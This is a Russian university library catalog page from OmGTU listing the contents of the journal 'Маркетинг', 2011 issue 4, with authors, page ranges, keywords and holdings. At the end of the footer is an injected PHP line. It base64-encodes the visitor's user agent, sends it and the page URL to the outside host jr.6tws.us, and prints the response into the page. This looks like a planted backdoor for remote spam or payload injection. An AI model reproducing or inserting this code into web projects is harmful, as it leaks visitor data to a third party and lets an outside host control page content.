Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

241 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=М10/2011/4")
Результаты поиска
E_OMSTU: Найдено записей: 1
1. 
М10/2011/4
Шифр: М10/2011/4
Журнал

Маркетинг [Текст] / Федер. контракт. корпорация "РОСКОНТРАКТ". - М. : Центр маркетинговых исслед. и менеджмента, 1991 - . - ISSN 08693722. - Выходит раз в два месяца
2011г. N 4
Содержание:
Магомедов, Ш. Качество потребляемой продукции - показатель качества жизни / Ш. Магомедов. - С.3-13 : рис.
Кл.слова: Конкурентоспособность продукции, Общественные потребности, Квалитативная революция
Ковалев, А. Наноматериалы и нанотехнологии для защиты окружающей среды / А. Ковалев. - С.14-31 : рис.
Кл.слова: Экология, Очистка, Последствия
Кошечкин, С. Прогнозирование объемов продаж / С. Кошечкин, А. Муштакова. - С.32-43 : табл.
Кл.слова: Стоимость компании, Сезонность, Тренд
Рыкалина, О. Маркетинговый инструментарий в реализации логических инноваций / О. Рыкалина. - С.44-55 : табл.
Кл.слова: Снабжение, Производство, Сбыт
Майкова, С. Имидж города в системе территориального маркетинга / С. Майкова, И. Гвоздецкая, Т. Сармаева. - С.56-65 : табл.
Кл.слова: Инновационный климат, Регион, Муниципалитет
Махов, А. Маркетинговое управление спортивными клубами / А. Махов. - С.66-79 : табл.
Кл.слова: Управление качеством, Требования, Спортсмены-инвалиды
Алексеенко, В. Маркетинговые исследования рынка вывоза твердых отходов / В. Алексеенко, Н. Сопилко. - С.80-86 : рис.
Кл.слова: Индустриализация, Экология, Конкурентоспособность
Худжберг, Р. Индивидуальный инструктаж в обучении руководителей / Р. Худжберг, Н. Лэйн. - С.87-91 : рис.
Азоева, О. Бизнес-модели интернет-коммерции: особенности формирования и развития / О. Азоева. - С.92-100 : табл.
Кл.слова: Он-лайн покупатели, Телекоммуникационная инфраструктура, Клиентская база
Матковская, Я. Рынок G2B: генезис и перспективы / Я. Матковская. - С.101-107.
Кл.слова: Государственный маркетинг, Коммерциализация, Инновации
Борзов, С. Фандрайзинг в высшей школе / С. Борзов. - С.108-126 : рис.
Кл.слова: Кругооборот капитала, Денежные средства, СпонсорствоЭкз-ры полностью М10/2011/4
Имеются экземпляры в отделах: всего 1 : ОНЛ (1)
Свободны: ОНЛ (1)
Оглавление 
  • Магомедов, Ш. Качество потребляемой продукции - показатель качества жизни / Ш. Магомедов. - 4.3-13 : рис.
    Кл. слова: Конкурентоспособность продукции, Общественные потребности, Квалитативная революция
  • Ковалев, А. Наноматериалы и нанотехнологии для защиты окружающей среды / А. Ковалев. - 4.14-31 : рис.
    Кл. слова: Экология, Очистка, Последствия
  • Кошечкин, С. Прогнозирование объемов продаж / С. Кошечкин, А. Муштакова. - 4.32-43 : табл.
    Кл. слова: Стоимость компании, Сезонность, Тренд
  • Рыкалина, О. Маркетинговый инструментарий в реализации логических инноваций / О. Рыкалина. - 4.44-55 : табл.
    Кл. слова: Снабжение, Производство, Сбыт
  • Майкова, С. Имидж города в системе территориального маркетинга / С. Майкова, И. Гвоздецкая, Т. Сармаева. - 4.56-65 : табл.
    Кл. слова: Инновационный климат, Регион, Муниципалитет
  • Махов, А. Маркетинговое управление спортивными клубами / А. Махов. - 4.66-79 : табл.
    Кл. слова: Управление качеством, Требования, Спортсмены-инвалиды
  • Алексеенко, В. Маркетинговые исследования рынка вывоза твердых отходов / В. Алексеенко, Н. Сопилко. - 4.80-86 : рис.
    Кл. слова: Индустриализация, Экология, Конкурентоспособность
  • Худжберг, Р. Индивидуальный инструктаж в обучении руководителей / Р. Худжберг, Н. Лэйн. - 4.87-91 : рис.
  • Азоева, О. Бизнес-модели интернет-коммерции: особенности формирования и развития / О. Азоева. - 4.92-100 : табл.
    Кл. слова: Он-лайн покупатели, Телекоммуникационная инфраструктура, Клиентская база
  • Матковская, Я. Рынок G2B: генезис и перспективы / Я. Матковская. - 4.101-107.
    Кл. слова: Государственный маркетинг, Коммерциализация, Инновации
  • Борзов, С. Фандрайзинг в высшей школе / С. Борзов. - 4.108-126 : рис.
    Кл. слова: Кругооборот капитала, Денежные средства, Спонсорство
Экземпляры 
    Место храненияЭкземпляров
    ВсегоСвободно
    ОНЛ11


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2931 - 19.06.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.74 с.8 запросов, 0.30c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;